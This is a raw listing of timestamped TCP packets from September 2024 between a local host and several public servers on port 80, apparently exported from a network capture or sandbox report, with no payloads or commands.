                                                                                                                                                                                                            Sep 7, 2024 15:34:56.995898962 CEST6139780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.007292032 CEST6139780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.011564016 CEST6139880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.012471914 CEST806139788.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.012556076 CEST6139780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.016379118 CEST8061398172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.016509056 CEST6139880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.022957087 CEST6139880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.028476000 CEST8061398172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.499131918 CEST8061398172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.499380112 CEST6139880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.499454021 CEST8061398172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.499504089 CEST6139880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.499708891 CEST6139680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.500070095 CEST6139980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.504734039 CEST8061396172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.504791975 CEST6139680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.504869938 CEST8061399172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.504920006 CEST6139980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.505104065 CEST6139980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.509848118 CEST8061399172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.993714094 CEST8061399172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.993793964 CEST6139980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.706130028 CEST6140080192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.710928917 CEST806140088.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.711009026 CEST6140080192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.726006985 CEST6140080192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.729623079 CEST6140180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.730796099 CEST806140088.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.730859041 CEST6140080192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.734451056 CEST8061401172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.734519005 CEST6140180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.741848946 CEST6140180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.746681929 CEST8061401172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.217154026 CEST8061401172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.217184067 CEST8061401172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.217288017 CEST6140180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.217381954 CEST6140180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.233747959 CEST6139980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.234088898 CEST6140280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.238809109 CEST8061399172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.238863945 CEST6139980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.238868952 CEST8061402172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.238950968 CEST6140280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.239088058 CEST6140280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.243837118 CEST8061402172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.721636057 CEST8061402172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.721752882 CEST6140280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.886718035 CEST6140380192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.891632080 CEST806140364.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.891737938 CEST6140380192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.897959948 CEST6140380192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.902717113 CEST6140480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.902862072 CEST806140364.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.902920961 CEST6140380192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.907562017 CEST8061404172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.907835960 CEST6140480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.913547993 CEST6140480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.918387890 CEST8061404172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.425765991 CEST8061404172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.425879002 CEST8061404172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.426028013 CEST6140480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.426075935 CEST6140480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.426376104 CEST6140280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.426728010 CEST6140580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.431380987 CEST8061402172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.431538105 CEST8061405172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.431602955 CEST6140280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.431634903 CEST6140580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.431756973 CEST6140580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.436564922 CEST8061405172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.943790913 CEST8061405172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.943860054 CEST6140580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.643280983 CEST6140680192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.648108006 CEST806140645.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.648175955 CEST6140680192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.648277998 CEST6140680192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.652407885 CEST6140780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.653462887 CEST806140645.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.653543949 CEST6140680192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.657397985 CEST8061407172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.657476902 CEST6140780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.657562971 CEST6140780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.662425041 CEST8061407172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.253686905 CEST8061407172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.253707886 CEST8061407172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.253717899 CEST8061407172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.253797054 CEST6140780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.253912926 CEST6140780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.254216909 CEST6140580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.254626036 CEST6140880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.259290934 CEST8061405172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.259347916 CEST6140580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.259424925 CEST8061408172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.259511948 CEST6140880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.259665966 CEST6140880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.264489889 CEST8061408172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.750132084 CEST8061408172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.750201941 CEST6140880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.400067091 CEST6140980192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.404941082 CEST806140964.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.405024052 CEST6140980192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.405122995 CEST6140980192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.409794092 CEST6141080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.410520077 CEST806140964.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.410588026 CEST6140980192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.414746046 CEST8061410172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.414819956 CEST6141080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.414925098 CEST6141080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.419703960 CEST8061410172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.926264048 CEST8061410172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.926304102 CEST8061410172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.926374912 CEST6141080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.926461935 CEST6141080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.928065062 CEST6140880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.928363085 CEST6141180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.933116913 CEST8061408172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.933161974 CEST8061411172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.933198929 CEST6140880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.933243990 CEST6141180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.936316013 CEST6141180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.941152096 CEST8061411172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:08.437793016 CEST8061411172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:08.437880993 CEST6141180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.003386021 CEST6141280192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.008286953 CEST806141264.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.008449078 CEST6141280192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.008718014 CEST6141280192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.013674021 CEST806141264.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.013729095 CEST6141280192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.081238031 CEST6141380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.086196899 CEST8061413172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.086292982 CEST6141380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.086427927 CEST6141380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.091196060 CEST8061413172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.578429937 CEST8061413172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.578450918 CEST8061413172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.578511953 CEST6141380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.578636885 CEST6141380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.580974102 CEST6141180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.581269979 CEST6141480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.587084055 CEST8061411172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.587097883 CEST8061414172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.587157011 CEST6141180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.587183952 CEST6141480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.587378979 CEST6141480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.593128920 CEST8061414172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:10.098891973 CEST8061414172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:10.098968983 CEST6141480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.116161108 CEST6141580192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.121109962 CEST806141588.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.128237009 CEST6141580192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.133541107 CEST6141580192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.139309883 CEST806141588.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.139367104 CEST6141580192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.161746025 CEST6141680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.166572094 CEST8061416172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.167073965 CEST6141680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.167176008 CEST6141680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.171916008 CEST8061416172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.658231974 CEST8061416172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.658490896 CEST8061416172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.658586025 CEST6141680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.658651114 CEST6141680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.658885956 CEST6141480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.659190893 CEST6141780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.663953066 CEST8061414172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.663965940 CEST8061417172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.664012909 CEST6141480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.664053917 CEST6141780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.664191961 CEST6141780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.668934107 CEST8061417172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:12.355822086 CEST8061417172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:12.355886936 CEST6141780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.377217054 CEST6141880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.382010937 CEST806141845.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.382078886 CEST6141880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.382246971 CEST6141880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.386027098 CEST6141980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.387460947 CEST806141845.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.387530088 CEST6141880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.390902996 CEST8061419172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.390981913 CEST6141980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.398159027 CEST6141980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.402930021 CEST8061419172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.877209902 CEST8061419172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.877474070 CEST8061419172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.877562046 CEST6141980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.877639055 CEST6141980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.888509035 CEST6141780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.888896942 CEST6142080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.896384001 CEST8061417172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.896538973 CEST8061420172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.896595955 CEST6141780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.896621943 CEST6142080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.896779060 CEST6142080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.902122974 CEST8061420172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.386868000 CEST8061420172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.386926889 CEST6142080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.508033037 CEST6142180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.512933016 CEST806142145.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.514072895 CEST6142180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.519864082 CEST6142180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.524713039 CEST6142280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.524821043 CEST806142145.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.524878979 CEST6142180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.529504061 CEST8061422172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.531764984 CEST6142280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.538516998 CEST6142280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.544545889 CEST8061422172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.042725086 CEST8061422172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.042782068 CEST8061422172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.042881966 CEST6142280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.042932987 CEST6142280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.044898987 CEST6142080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.045253038 CEST6142380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.050512075 CEST8061420172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.050586939 CEST6142080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.050791979 CEST8061423172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.050862074 CEST6142380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.053064108 CEST6142380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.057910919 CEST8061423172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.535092115 CEST8061423172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.535146952 CEST6142380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.799125910 CEST6142480192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.803992987 CEST806142445.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.804076910 CEST6142480192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.804255962 CEST6142480192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.808702946 CEST6142580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.809206963 CEST806142445.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.809284925 CEST6142480192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.813862085 CEST8061425172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.813925028 CEST6142580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.819772959 CEST6142580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.824682951 CEST8061425172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.327594995 CEST8061425172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.327691078 CEST8061425172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.327754021 CEST6142580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.327786922 CEST6142580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.328380108 CEST6142380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.328753948 CEST6142680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.333455086 CEST8061423172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.333478928 CEST8061426172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.333518982 CEST6142380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.333559990 CEST6142680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.333831072 CEST6142680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.338665962 CEST8061426172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.816351891 CEST8061426172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.819037914 CEST6142680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.950117111 CEST6142780192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.954926014 CEST806142764.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.955004930 CEST6142780192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.955086946 CEST6142780192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.960259914 CEST806142764.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.960335016 CEST6142780192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.974416971 CEST6142880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.979245901 CEST8061428172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.979329109 CEST6142880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.991661072 CEST6142880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.996470928 CEST8061428172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.492641926 CEST8061428172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.492659092 CEST8061428172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.492736101 CEST6142880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.492805004 CEST6142880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.493058920 CEST6142680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.493345976 CEST6142980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.498137951 CEST8061429172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.498213053 CEST6142980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.498245001 CEST8061426172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.498301029 CEST6142680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.499243021 CEST6142980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.504004955 CEST8061429172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:19.003392935 CEST8061429172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:19.003453016 CEST6142980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.954946041 CEST6143080192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.959840059 CEST806143045.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.959930897 CEST6143080192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.960108995 CEST6143080192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.964950085 CEST806143045.79.222.138192.168.2.3
